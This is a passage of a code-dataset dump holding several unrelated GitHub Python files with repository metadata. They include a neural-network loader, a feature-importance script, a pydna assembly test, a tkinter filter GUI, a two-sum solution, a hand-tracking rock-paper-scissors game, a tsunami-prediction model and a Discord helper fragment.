self.dims+=2*[(N,)]\n\n layers += [nn.Linear(N, n_class)]\n self.dims+=[(n_class,)]\n\n self.blocks = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.blocks(x)\n\n\nclass CNN7(myNet):\n def __init__(self, device, dataset, n_class=10, input_size=32, input_channel=3, width1=4, width2=8, linear_size=512,\n net_dim=None, bn=False, bn2=False):\n super(CNN7, self).__init__(device, dataset, n_class, input_size, input_channel,\n conv_widths=[width1, width1, width2, width2, width2], kernel_sizes=[3, 3, 3, 3, 3],\n linear_sizes=[linear_size], strides=[1, 1, 2, 1, 1], paddings=[1, 1, 1, 1, 1],\n net_dim=net_dim, bn=bn, bn2=bn2)\n\n\ndef CNNA(dataset, bn, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch,\n conv_widths=[16, 32], kernel_sizes=[4, 4],\n linear_sizes=[100], strides=[2, 2], paddings=[1, 1],\n net_dim=None, bn=bn)\n\n\ndef get_dataset_info(dataset):\n if dataset == \"mnist\":\n return 1, 28, 10\n elif dataset == \"emnist\":\n return 1, 28, 10\n elif dataset == \"fashionmnist\":\n return 1, 28, 10\n elif dataset == \"svhn\":\n return 3, 32, 10\n elif dataset == \"cifar10\":\n return 3, 32, 10\n elif dataset == \"tinyimagenet\":\n return 3, 56, 200\n else:\n raise ValueError(f\"Dataset {dataset} not available\")\n\n\ndef freeze_network(network: nn.Module) -> None:\n for param in network.parameters():\n param.requires_grad = False\n\n\ndef load_net_from(config: Bunch) -> nn.Module:\n path = config.network_path\n try:\n n_layers = config.n_layers\n n_neurons_per_layer = config.n_neurons_per_layer\n except AttributeError:\n n_layers = None\n n_neurons_per_layer = None\n return load_net(path, n_layers, n_neurons_per_layer)\n\n\ndef load_net( # noqa: C901\n path: str, n_layers: Optional[int], n_neurons_per_layer: 
Optional[int]\n) -> nn.Module:\n if path.split(\".\")[-1] in [\"onnx\", \"gz\"]:\n return load_onnx_model(path)[0]\n elif \"mnist_sig\" in path and \"flattened\" in path:\n assert n_layers is not None and n_neurons_per_layer is not None\n original_network = mnist_sig_a_b(n_layers, n_neurons_per_layer)\n elif \"mnist\" in path and \"flattened\" in path:\n assert n_layers is not None and n_neurons_per_layer is not None\n original_network = mnist_a_b(n_layers, n_neurons_per_layer)\n elif \"mnist-net\" in path:\n assert n_layers is not None and n_neurons_per_layer is not None\n original_network = mnist_vnncomp_a_b(n_layers, n_neurons_per_layer)\n elif \"mnist_convSmallRELU__Point\" in path:\n original_network = mnist_conv_small()\n elif \"mnist_SIGMOID\" in path:\n original_network = mnist_conv_sigmoid_small()\n elif \"mnist_convBigRELU__DiffAI\" in path:\n original_network = mnist_conv_big()\n elif \"mnist_convSuperRELU__DiffAI\" in path:\n original_network = mnist_conv_super()\n elif \"cifar10_convSmallRELU__PGDK\" in path:\n original_network = cifar10_conv_small()\n elif \"cifar_cnn_a\" in path:\n original_network = cifar10_cnn_A()\n elif \"cifar_cnn_b\" in path:\n original_network = cifar10_cnn_B()\n elif \"mnist_cnn_a\" in path:\n original_network = mnist_cnn_A()\n elif \"cifar_base_kw\" in path:\n original_network = cifar10_base()\n elif \"cifar_wide_kw\" in path:\n original_network = cifar10_wide()\n elif \"cifar_deep_kw\" in path:\n original_network = cifar10_deep()\n elif \"cifar10_2_255_simplified\" in path:\n original_network = cifar10_2_255_simplified()\n elif \"cifar10_8_255_simplified\" in path:\n original_network = cifar10_8_255_simplified()\n elif \"cifar10_convBigRELU__PGD\" in path:\n original_network = cifar10_conv_big()\n elif \"resnet_2b2\" in path:\n original_network = resnet2b2(bn=\"bn\" in path)\n elif \"resnet_2b\" in path:\n original_network = resnet2b()\n elif \"resnet_3b2\" in path:\n original_network = resnet3b2(bn=\"bn\" in path)\n elif \"resnet_4b1\" in path:\n original_network = resnet4b1(bn=\"bn\" in path)\n elif \"resnet_4b2\" in path:\n original_network = resnet4b2(bn=\"bn\" in path)\n elif \"resnet_4b\" in path:\n original_network = resnet4b()\n elif \"resnet_9b_bn\" in path:\n original_network = resnet9b(bn=True)\n elif \"ConvMed_tiny\" in path:\n if \"cifar10\" in path:\n original_network = ConvMed_tiny(\"cifar10\", bn=\"bn\" in path)\n elif \"mnist\" in path:\n original_network = ConvMed_tiny(\"mnist\", bn=\"bn\" in path)\n elif \"ConvMedBig\" in path:\n if \"cifar10\" in path:\n original_network = ConvMedBig(\"cifar10\")\n elif \"mnist\" in path:\n original_network = ConvMedBig(\"mnist\")\n elif \"ConvMed2\" in path:\n if \"cifar10\" in path:\n original_network = ConvMed2(\"cifar10\")\n elif \"mnist\" in path:\n original_network = ConvMed2(\"mnist\")\n elif \"ConvMed\" in path:\n if \"cifar10\" in path:\n original_network = ConvMed(\"cifar10\")\n elif \"mnist\" in path:\n original_network = ConvMed(\"mnist\")\n elif \"SP1\" in path:\n #original_network = CNNA(\"fashionmnist\", False, \"cuda\")\n if \"cifar10\" in path:\n original_network = CNN7(\"cuda\", \"cifar10\", input_size=32, input_channel=3, bn=True)\n elif \"mnist\" in path:\n original_network = CNN7(\"cuda\", \"mnist\", input_size=28, input_channel=1, bn=True)\n elif \"tiny\" in path:\n original_network = CNN7(\"cuda\", \"tinyimagenet\", input_size=56, input_channel=3, n_class=200, bn=True)\n elif \"CNN7\" in path:\n if \"no_BN\" in path:\n bn = False\n else:\n bn = True\n if \"cifar10\" in 
path:\n original_network = CNN7(\"cuda\", \"cifar10\", input_size=32, input_channel=3, bn=bn)\n elif \"mnist\" in path:\n original_network = CNN7(\"cuda\", \"mnist\", input_size=28, input_channel=1, bn=bn)\n elif \"tiny\" in path:\n original_network = CNN7(\"cuda\", \"tinyimagenet\", input_size=56, input_channel=3, n_class=200, bn=bn)\n else:\n raise NotImplementedError(\n \"The network specified in the configuration could not be loaded.\"\n )\n else:\n raise NotImplementedError(\n \"The network specified in the configuration could not be loaded.\"\n )\n state_dict = torch.load(path)\n if \"state_dict\" in state_dict.keys():\n state_dict = state_dict[\"state_dict\"]\n original_network.load_state_dict(state_dict)\n if hasattr(original_network, \"blocks\"):\n # myNet-style models wrap their layers in .blocks; plain nn.Sequential nets do not\n original_network = original_network.blocks\n freeze_network(original_network)\n\n return original_network\n\n\ndef load_onnx_model(path: str) -> Tuple[nn.Sequential, Tuple[int, ...], str]:\n onnx_model = load_onnx(path)\n return load_onnx_from_proto(onnx_model, path)\n\n\ndef load_onnx_from_proto(\n onnx_model: onnx.ModelProto, path: Optional[str] = None\n) -> Tuple[nn.Sequential, Tuple[int, ...], str]:\n\n onnx_input_dims = onnx_model.graph.input[-1].type.tensor_type.shape.dim\n inp_name = onnx_model.graph.input[-1].name\n onnx_shape = tuple(d.dim_value for d in onnx_input_dims[1:])\n pytorch_model = ConvertModel(onnx_model)\n\n if path is not None and \"unet\" in path:\n pytorch_structured = pytorch_model.forward_trace_to_graph_unet()\n softmax_idx = [\n i for (i, layer) in enumerate(pytorch_structured) if \"Softmax\" in str(layer)\n ][0]\n pytorch_structured = pytorch_structured[: softmax_idx - 1]\n pytorch_structured.append(nn.Flatten())\n elif len(onnx_shape) == 0 and path is not None and \"vgg16-7\" in path:\n onnx_shape = (3, 224, 224)\n pytorch_structured = pytorch_model.forward_trace_to_graph()\n elif len(onnx_shape) == 0 and path is not None and (\"test_nano\" in path or \"test_tiny\" in path or \"test_small\" in path):\n onnx_shape = (1,)\n pytorch_structured = pytorch_model.forward_trace_to_graph()\n else:\n pytorch_structured = pytorch_model.forward_trace_to_graph()\n\n return pytorch_structured, onnx_shape, inp_name\n\n\n@typing.no_type_check\ndef load_onnx(path: str):\n # The official benchmark repo has all networks with the wrong ending\n if not exists(path) and not path.endswith(\".gz\"):\n path = path + \".gz\"\n if path.endswith(\".gz\"):\n onnx_model = onnx.load(gzip.GzipFile(path))\n else:\n onnx_model = onnx.load(path)\n return onnx_model\n","repo_name":"eth-sri/mn-bab","sub_path":"src/utilities/loading/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":28413,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"14410707354","text":"# based off of\n# http://scikit-learn.org/stable/auto_examples/ensemble/plot_forest_importances.html#example-ensemble-plot-forest-importances-py\nimport numpy as np\n\nfrom sklearn.ensemble import ExtraTreesClassifier\n\n# Loads feature data from features file.\ndef load_data():\n data = []\n target = []\n with open('files/feats/test.lsvm', 'r') as f:\n for i, line in enumerate(f.readlines()):\n feats = []\n features = line.split(' ')\n for j, feature in enumerate(features):\n # Ignore features > 192\n if (len(feature.split(':')) == 2 and j < 192):\n feats.append(feature.split(':')[1])\n data.append(feats)\n if i <= 10: # BRK\n target.append(1)\n elif i <= 54: # BRM\n target.append(2)\n elif i <= 941: # GRW\n target.append(3)\n elif i <= 1014: # 
LRM\n target.append(4)\n elif i <= 1060: # LRR\n target.append(5)\n elif i <= 1063: # MCR\n target.append(6)\n elif i <= 1078: # ROR\n target.append(7)\n elif i <= 1105: # RRM\n target.append(8)\n elif i <= 1163: # RUM\n target.append(9)\n elif i <= 1290: # SQK\n target.append(10)\n elif i <= 1303: # SQL\n target.append(11)\n elif i <= 1348: # TMP\n target.append(12)\n\n return data, target\n\ndef main():\n X, y = load_data()\n # Build a forest and compute the feature importances\n # (feature_importances_ is always available after fit; the old compute_importances flag was removed from sklearn)\n forest = ExtraTreesClassifier(n_estimators=250, random_state=0)\n \n forest.fit(X, y)\n importances = forest.feature_importances_\n std = np.std([tree.feature_importances_ for tree in forest.estimators_],\n axis=0)\n indices = np.argsort(importances)[::-1]\n # Print the feature ranking\n print(\"Feature ranking:\")\n \n for f in range(len(indices)):\n print(\"%d. feature %d (%f)\" % (f + 1, indices[f],\n importances[indices[f]]))\n\n # Plot the feature importances of the forest\n import pylab as pl\n pl.figure()\n pl.title(\"Feature importances\")\n # keep only the ten most important features so the bar positions and heights line up\n pl.bar(range(10), importances[indices][:10],\n color=\"r\", yerr=std[indices][:10], align=\"center\")\n pl.xticks(range(10), indices[:10])\n pl.xlim([-1, 10])\n pl.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tsakhuja/cs224s-proj","sub_path":"feature-select.py","file_name":"feature-select.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17522937737","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\ntest pGUP1\n'''\n\nimport unittest\n\nclass test_empty(unittest.TestCase):\n\n def test_empty(self):\n ''' test pGUP1'''\n\n import os\n\n cwd = os.getcwd()\n\n os.chdir(\"../docs/cookbook/\")\n \n import pydna\n\n GUP1rec1sens = pydna.read(\"GUP1rec1sens.txt\")\n GUP1rec2AS = pydna.read(\"GUP1rec2AS.txt\")\n GUP1_locus = pydna.read(\"GUP1_locus.gb\")\n pGREG505 = pydna.read(\"pGREG505.gb\")\n \n os.chdir(cwd)\n\n insert = pydna.pcr(GUP1rec1sens, GUP1rec2AS, GUP1_locus)\n\n from Bio.Restriction import SalI\n\n lin_vect, his3 = pGREG505.cut(SalI)\n\n a = pydna.Assembly([insert, lin_vect], limit=28)\n \n pGUP1 = a.circular_products[0]\n \n pGUP1 = pGUP1.synced(pGREG505.seq[:50]) \n \n pGUP1_correct = pydna.read(\"pGUP1_correct.gb\") \n \n self.assertEqual(len(pGUP1_correct), 9981)\n self.assertEqual(len(pGUP1), 9981)\n self.assertTrue( pydna.eq(pGUP1, pGUP1_correct) ) \n self.assertEqual(pGUP1_correct.seguid(), \"42wIByERn2kSe_Exn405RYwhffU\") \n self.assertEqual(pGUP1.seguid(), \"42wIByERn2kSe_Exn405RYwhffU\") \n\nif __name__ == '__main__':\n unittest.main()\n\n\n\n\n\n\n\n\n\n","repo_name":"bruno2git/pydna","sub_path":"tests/test_assemble_pGUP1.py","file_name":"test_assemble_pGUP1.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"38539506918","text":"# importing module\r\nfrom pandas import *\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter.filedialog import asksaveasfile\r\n\r\nfilter_window = tk.Tk()\r\nfilter_window.title('Filter')\r\nfilter_window.geometry(\"400x600\")\r\nfilter_window.configure(bg='#262c2b')\r\nfilter_top_frame = tk.Frame(filter_window)\r\nfilter_top_frame.pack(side=tk.TOP)\r\nfilter_top_frame.configure(bg='#262c2b')\r\nfilter_bottom_frame = tk.Frame(filter_window)\r\nfilter_bottom_frame.pack(side=tk.BOTTOM)\r\nfilter_bottom_frame.configure(bg='#262c2b')\r\nmultiplication_filter = []\r\nband_center = [1, 1.25, 1.6, 2, 2.5, 3.15, 
4, 5, 6.3, 8, 10, 12.5, 16, 20, 25, 31.5, 40, 50, 63, 80, 100]\r\n\r\n\r\ndef load_filter_csv():\r\n temp_filter_name = (tk.filedialog.askopenfile(mode='r', filetypes=[('CSV file', '*.csv')]))\r\n if not temp_filter_name: # dialog cancelled\r\n return\r\n\r\n data = read_csv(str(temp_filter_name.name))\r\n # replace the defaults in place and refresh the table; append() used to add the whole\r\n # pandas column as a single extra list element instead of the individual values\r\n multiplication_filter.clear()\r\n multiplication_filter.extend(data['F'].tolist())\r\n for i, value in enumerate(multiplication_filter[:len(band_center)]):\r\n octave_values.item(i, values=(band_center[i], value))\r\n\r\n\r\nfilter_csv_button = tk.Button(\r\n filter_top_frame,\r\n text=\"Load CSV\",\r\n width=20,\r\n fg='white', bg='black',\r\n command=lambda: load_filter_csv(),\r\n font='Lato 10 bold')\r\nfilter_csv_button.pack(side=tk.TOP, pady=5, padx=5)\r\n\r\nif not multiplication_filter:\r\n multiplication_filter = [1] * len(band_center)\r\n\r\noctave_frame = tk.Frame(filter_top_frame)\r\noctave_frame.pack(side=tk.TOP, pady=5, padx=5)\r\noctave_scroll = tk.Scrollbar(octave_frame, orient='vertical')\r\noctave_scroll.pack(side='right', fill='y')\r\n\r\noctave_values = ttk.Treeview(octave_frame, yscrollcommand=octave_scroll.set)\r\noctave_values.pack()\r\n\r\noctave_scroll.config(command=octave_values.yview)\r\n\r\n# column definition\r\noctave_values['columns'] = ('center_band', 'filter_value')\r\n\r\noctave_values.column(\"#0\", width=0, stretch=False)\r\noctave_values.column(\"center_band\", anchor='center', width=120)\r\noctave_values.column(\"filter_value\", anchor='center', width=120)\r\n\r\n# headings\r\noctave_values.heading(\"#0\", text=\"\", anchor='center')\r\noctave_values.heading(\"center_band\", text=\"Band Frequency [Hz]\", anchor='center')\r\noctave_values.heading(\"filter_value\", text=\"Filter value\", anchor='center')\r\n\r\nfor i in range(len(multiplication_filter)):\r\n octave_values.insert(parent='', index='end', iid=i, text='', values=(band_center[i], multiplication_filter[i]))\r\n\r\n# labels\r\ncenter_band = tk.Label(filter_top_frame, text=\"center_band\", width=10)\r\ncenter_band.pack(side=tk.LEFT, padx=5, pady=5, anchor=tk.N)\r\n\r\nfilter_value = tk.Label(filter_top_frame, text=\"filter_value\", width=10)\r\nfilter_value.pack(side=tk.LEFT, padx=5, pady=5, anchor=tk.N)\r\n\r\n# entry boxes\r\ncenter_band_entry = tk.Entry(filter_top_frame, width=10)\r\ncenter_band_entry.pack(side=tk.LEFT, padx=5, pady=5, anchor=tk.S)\r\n\r\nfilter_value_entry = tk.Entry(filter_top_frame, width=10)\r\nfilter_value_entry.pack(side=tk.LEFT, padx=5, pady=5, anchor=tk.S)\r\n\r\n# select record\r\n\r\n\r\ndef select_record():\r\n # clear entry boxes\r\n center_band_entry.delete(0, 'end')\r\n filter_value_entry.delete(0, 'end')\r\n\r\n # grab record\r\n selected = octave_values.focus()\r\n # grab record values\r\n record_values = octave_values.item(selected, 'values')\r\n # temp_label.config(text=selected)\r\n\r\n # output to entry boxes\r\n center_band_entry.insert(0, record_values[0])\r\n filter_value_entry.insert(0, record_values[1])\r\n\r\n\r\n# save record\r\ndef update_record():\r\n selected = octave_values.focus()\r\n # save new data\r\n octave_values.item(selected, text=\"\", values=(center_band_entry.get(), filter_value_entry.get()))\r\n\r\n # clear entry boxes\r\n center_band_entry.delete(0, 'end')\r\n filter_value_entry.delete(0, 'end')\r\n\r\n\r\nselect_button = tk. 
Button(filter_window, text=\"Select Record\", command=select_record)\nselect_button.pack(pady=10)\n\nedit_button = tk.Button(filter_window, text=\"Edit \", command=update_record)\nedit_button.pack(pady=10)\n\nfilter_info_label = tk.Label(filter_bottom_frame,\n text=\"Filter applied\",\n fg='white', bg='#262c2b',\n font='Lato 8')\nfilter_info_label.pack(side=tk.BOTTOM, anchor=tk.S, pady=5, padx=5)\nfilter_list = [0]*21\n\n# print(filter_list)\n\nfilter_ok_button = tk.Button(\n filter_bottom_frame,\n text=\"OK\",\n width=20,\n fg='white', bg='black',\n command=lambda: get_filter_values() ,\n font='Lato 10 bold')\nfilter_ok_button.pack(side=tk.BOTTOM, pady=5, padx=5)\n\n\ndef get_filter_values():\n for j in range(len(band_center)):\n temp_dict = octave_values.item(j)\n octave_values_list = list(temp_dict.values())\n filter_list[j] = octave_values_list[2][1]\n filter_window.destroy()\n\n\nfilter_window.mainloop()\n","repo_name":"bianekk/filtr-function","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18058914849","text":"# Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n# You can return the answer in any order.\n\n\n# Example 1:\n\n# Input: nums = [2, 7, 11, 15], target = 9\n# Output: [0, 1]\n# Output: Because nums[0] + nums[1] == 9, we return [0, 1].\n# Example 2:\n\n# Input: nums = [3, 2, 4], target = 6\n# Output: [1, 2]\n# Example 3:\n\n# Input: nums = [3, 3], target = 6\n# Output: [0, 1]\n\n\n\"\"\"\n naive: nested for loop, checking every combination of numbers to see if pair meets target\n O(n^2) time, may time out\n\n optimal: use dictionary\n create an empty dict\n\n enumerate through nums\n check condition if target - num is a key already. 
if it is:\n return dict[target - num] and current index\n always store dict[num] = i for later lookups\n\n\n\"\"\"\n\nfrom typing import List\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n #create a dict\n dict = {}\n\n #enumerate through nums\n for i, num in enumerate(nums):\n if target - num in dict:\n return [dict[target - num], i]\n dict[num] = i\n ","repo_name":"hjungj21o/Interview-DS-A","sub_path":"lc_bloomberg.py/1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36367399175","text":"import random\r\nimport cv2\r\nimport cvzone\r\nfrom cvzone.HandTrackingModule import HandDetector\r\nimport time\r\n\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3, 640)\r\ncap.set(4, 480)\r\n\r\ntimer = 0\r\nstateResult = False\r\nstartGame = False\r\ndetect = HandDetector(maxHands=1)\r\nscores = [0, 0]\r\nescape=True\r\nimgAI = None # set once the AI picks a move; guards the overlay below when no hand was detected\r\n\r\nwhile escape:\r\n imgBG = cv2.imread(\"resource/BG.png\")\r\n success, img = cap.read()\r\n\r\n imgScaled = cv2.resize(img, (0, 0), None, 0.646, 0.646)\r\n imgScaled = imgScaled[:, 35:375]\r\n\r\n #tofindhands\r\n hands, img = detect.findHands(imgScaled)\r\n if startGame:\r\n\r\n if stateResult is False:\r\n timer = time.time() - initialTime\r\n cv2.putText(imgBG, str(int(timer)), (605, 435), cv2.FONT_HERSHEY_PLAIN, 6, (255, 0, 255), 4)\r\n\r\n if timer > 3:\r\n stateResult = True\r\n timer = 0\r\n if hands:\r\n playerMove=None\r\n hand = hands[0]\r\n fingers = detect.fingersUp(hand)\r\n if fingers == [0, 0, 0, 0, 0]:\r\n playerMove = 1\r\n if fingers == [1, 1, 1, 1, 1]:\r\n playerMove = 2\r\n if fingers == [0, 1, 1, 0, 0]:\r\n playerMove = 3\r\n randomNumber = random.randint(1, 3)\r\n imgAI = cv2.imread(f'resource/{randomNumber}.png', cv2.IMREAD_UNCHANGED)\r\n imgBG=cvzone.overlayPNG(imgBG,imgAI, (217, 389))\r\n # Player Wins\r\n if (playerMove == 1 and randomNumber == 3) or \\\r\n (playerMove == 2 and randomNumber == 1) or \\\r\n (playerMove == 3 and randomNumber == 2):\r\n scores[1] += 1\r\n\r\n # AI Wins\r\n if (playerMove == 3 and randomNumber == 1) or \\\r\n (playerMove == 1 and randomNumber == 2) or \\\r\n (playerMove == 2 and randomNumber == 3):\r\n scores[0] += 1\r\n\r\n imgBG[292:602, 813:1153] = imgScaled\r\n\r\n\r\n if stateResult and imgAI is not None:\r\n imgBG = cvzone.overlayPNG(imgBG, imgAI, (217, 389))\r\n\r\n\r\n cv2.putText(imgBG, str(scores[0]), (410, 215), cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 6)\r\n cv2.putText(imgBG, str(scores[1]), (1112, 215), cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 6)\r\n\r\n cv2.imshow(\"BG\", imgBG)\r\n key=cv2.waitKey(1)\r\n if key == ord('s'):\r\n startGame = True\r\n initialTime = time.time()\r\n stateResult = False\r\n if key == 27:\r\n escape= False\r\n cv2.destroyAllWindows()\r\n","repo_name":"SCCSEAOT/python-projects","sub_path":"Rock Paper Scissor game/Rock Paper Scissors.py","file_name":"Rock Paper Scissors.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"12226715183","text":"\n\"\"\"\nCreated on Fri Dec 8 14:24:47 2017\n\n@author: gautham\n\n\tThis is a machine learning model to predict the occurrence of a tsunami with the help of the important\n\tcharacteristics of earthquakes as per International Tsunami Warning Center. 
The important characteristics\n\tof earthquakes specified for the occurrence of a tsunami by International Tsunami Warning Center in the article\n\t\" International Tsunami Warning Center. About Tsunamis. (2013). Accessed 14 January 2013. \" are large,\n\tshallow earthquakes with an epicentre or fault line near or on the ocean floor. These are the main causes\n\tof a tsunami created by an earthquake.\n\n\tThe above characteristics correspond to the following parameters:\n\t1. Magnitude\n\t2. Focal Depth\n\t3. Region of Occurrence such as Land(near ocean floor) or Ocean bed\n\t4. Distance from the ocean bed if the epicenter is in land.\n\nAccuracy achieved so far:\n\nRandom Forest Classifier : 97.99\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.decomposition import PCA\nimport joblib # sklearn.externals.joblib was removed from scikit-learn; use the standalone package\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport matplotlib.pyplot as plt\n\n\nfile_name = os.path.dirname(os.path.abspath(__file__)) + \"/model.pkl\"\n\n\ndef plot_graph(df, legend_1, legend_2):\n\tpositives = df.loc[df[\"class\"] == 1]\n\tnegatives = df.loc[df[\"class\"] == 0]\n\tfigure = plt.figure()\n\tplt.xlabel(legend_1[1])\n\tplt.ylabel(legend_2[1])\n\tplt.plot(positives.iloc[:, legend_1[0]], positives.iloc[:, legend_2[0]], 'ro', label=\"Tsunamigenic\")\n\tplt.plot(negatives.iloc[:, legend_1[0]], negatives.iloc[:, legend_2[0]], 'bo', label=\"Non-Tsunamigenic\")\n\tplt.legend(loc=\"best\")\n\tfigure.savefig(legend_1[2] + \"_vs_\" + legend_2[2] + \".svg\", format='svg', dpi=1200)\n\tplt.show()\n\n\ndef features_relationship(df, array):\n\tcolors = np.where(df.iloc[:, -1] > 0, 'b', 'r')\n\tlegends = ['magnitude', 'depth', 'region', 'distance']\n\tf, ax_arr = plt.subplots(4,3)\n\tf.canvas.set_window_title('Feature Relationship')\n\tf.subplots_adjust(hspace=0.36, top=1.0, bottom=0.06, wspace=0.22, left=0.05, right=0.95)\n\tx, y = 0, 0\n\tfor i in range(len(legends)):\n\t\ty = 0\n\t\tfor j in range(len(legends)):\n\t\t\tif legends[i] != legends[j]:\n\t\t\t\tax_arr[x, y].set(xlabel=legends[i], ylabel=legends[j])\n\t\t\t\tax_arr[x, y].scatter(df.iloc[:, i], df.iloc[:, j], c=colors)\n\t\t\t\ty += 1\n\t\tx += 1\n\tfigManager = plt.get_current_fig_manager()\n\t#figManager.window.showMaximized()\n\tplt.show()\n\n\ndef dimensional_reduction(features, labels):\n\tpca = PCA(n_components=2)\n\tpca.fit(features)\n\tfirst_component = pca.components_[0]\n\tsecond_component = pca.components_[1]\n\treduced_data = pca.transform(features)\n\tf = plt.figure(figsize=(8, 8))\n\tf.canvas.set_window_title('PCA of Tsunami Dataset')\n\tpos = plt.scatter(reduced_data[labels == 1, 0], reduced_data[labels == 1, 1], color='b', lw=2)\n\tneg = plt.scatter(reduced_data[labels == 0, 0], reduced_data[labels == 0, 1], color='r', lw=2)\n\tplt.legend((pos, neg), ('Tsunami-genic', 'Non Tsunami-genic'))\n\tplt.show()\n\n\ndef target_feature_split(dataset):\n\treturn dataset[:, 0:4], dataset[:, -1]\n\n\ndef split_dataset(X, y):\n\treturn train_test_split(X, y, test_size=0.25, random_state=50)\n\n\ndef train_model(features, labels):\n\tclf = RandomForestClassifier(n_estimators=5, random_state=1)\n\tclf.fit(features, labels)\n\t_ = joblib.dump(clf, file_name)\n\n\n
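# usage sketch (hypothetical arrays): train_model(X_train, y_train) persists the forest to model.pkl,\n# after which test_model(X_test) reloads it and returns the predicted classes\n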
def test_model(features):\n\ttry:\n\t\tclf = joblib.load(file_name)\n\t\treturn clf.predict(features)\n\texcept Exception:\n\t\tprint('Please train the model...')\n\ndef get_cv_score(X, y):\n\ttry:\n\t\tclf = joblib.load(file_name)\n\t\tcv = ShuffleSplit(n_splits=5, test_size=0.30, random_state=50)\n\t\treturn cross_val_score(clf, X, y, cv=cv)\n\texcept Exception:\n\t\tprint('Please train the model...')\n\ndef find_score(pred_values, actual_values):\n\treturn accuracy_score(pred_values, actual_values)\n\n\ndef predict_tsunami(features):\n\ttry:\n\t\tclf = joblib.load(file_name)\n\t\tpred = clf.predict(features)\n\t\treturn True if pred[0] else False\n\texcept Exception:\n\t\tprint('Please train the model...')\n\n\nif __name__ == '__main__':\n\tlabels = ['magnitude', 'focal_depth', 'region', 'distance', 'class']\n\tdf = pd.read_csv(os.path.dirname(os.path.abspath(__file__)) + \"/../dataset/dataset_final_v7.csv\", names=labels)\n\tdataset = df.to_numpy() # DataFrame.as_matrix() was removed in pandas 1.0\n\n\t# View relationship between features\n\t#features_relationship(df, dataset)\n\n\t# View individual plot\n\t#plot_graph(df, [0, \"Magnitude (Richter Scale)\", \"magnitude\"], [1, \"Focal depth (Km)\", \"depth\"])\n\t#plot_graph(df, [0, \"Magnitude (Richter Scale)\", \"magnitude\"], [3, \"Distance from nearest coastal point (Km)\", \"distance\"])\n\t#plot_graph(df, [0, \"Magnitude (Richter Scale)\", \"magnitude\"], [2, \"Region of epicenter (Land - 1 / Sea - 0)\", \"region\"])\n\t#plot_graph(df, [1, \"Focal depth (Km)\", \"depth\"], [2, \"Region of epicenter (Land - 1 / Sea - 0)\", \"region\"])\n\t#plot_graph(df, [1, \"Focal depth (Km)\", \"depth\"], [3, \"Distance from nearest coastal point (Km)\", \"distance\"])\n\n\t# Split dataset\n\tX, y = target_feature_split(dataset)\n\tfeatures_train, features_test, labels_train, labels_test = split_dataset(X, y)\n\n\t# Dimensional Reduction\n\t#dimensional_reduction(X, y)\n\n\t# Training the model\n\ttrain_model(features_train, labels_train)\n\n\t# Testing the model\n\tpred = test_model(features_test)\n\n\t# Evaluating the model\n\tscore = find_score(pred, labels_test)\n\n\t# Confusion matrix\n\tprint(confusion_matrix(labels_test, pred, labels=[1,0]))\n\n\t# Classification report\n\tprint(classification_report(labels_test, pred, target_names=['class 0', 'class 1']))\n\n\t# Score\n\tprint('Score : {}'.format(round(score * 100, 2)))\n\n\t# CV Score\n\tcv_score = get_cv_score(X, y)\n\tprint('Score : {} (+/- {})'.format(round(cv_score.mean(), 2), round(cv_score.std(), 2)))\n","repo_name":"gauthampughazhendhi/earthosys-tsunami-alert-system","sub_path":"earthosys_model/model/tsunami_predictor.py","file_name":"tsunami_predictor.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24293549504","text":"from discord.errors import Forbidden\r\nimport discord\r\nimport asyncio\r\nfrom datetime import datetime\r\nimport os.path\r\nimport csv\r\nimport sys\r\nimport re\r\nimport cv2\r\nimport requests\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport io\r\nfrom pprint import pprint\r\nimport struct\r\n\r\n\r\nasync def send_embed(ctx, embed, view=None, delete_after=None):\r\n \"\"\"\r\n Function that handles the sending of embeds\r\n -> Takes context and embed to send\r\n - tries to send embed in channel\r\n - tries to send normal message when that fails\r\n - tries to send embed private with information about missing permissions\r\n If this all fails: https://youtu.be/dQw4w9WgXcQ\r\n \"\"\"\r\n 
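# hedged usage sketch (assumes a discord.py commands.Context):\r\n # await send_embed(ctx, info_embed(\"Status\"), delete_after=30)\r\n 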
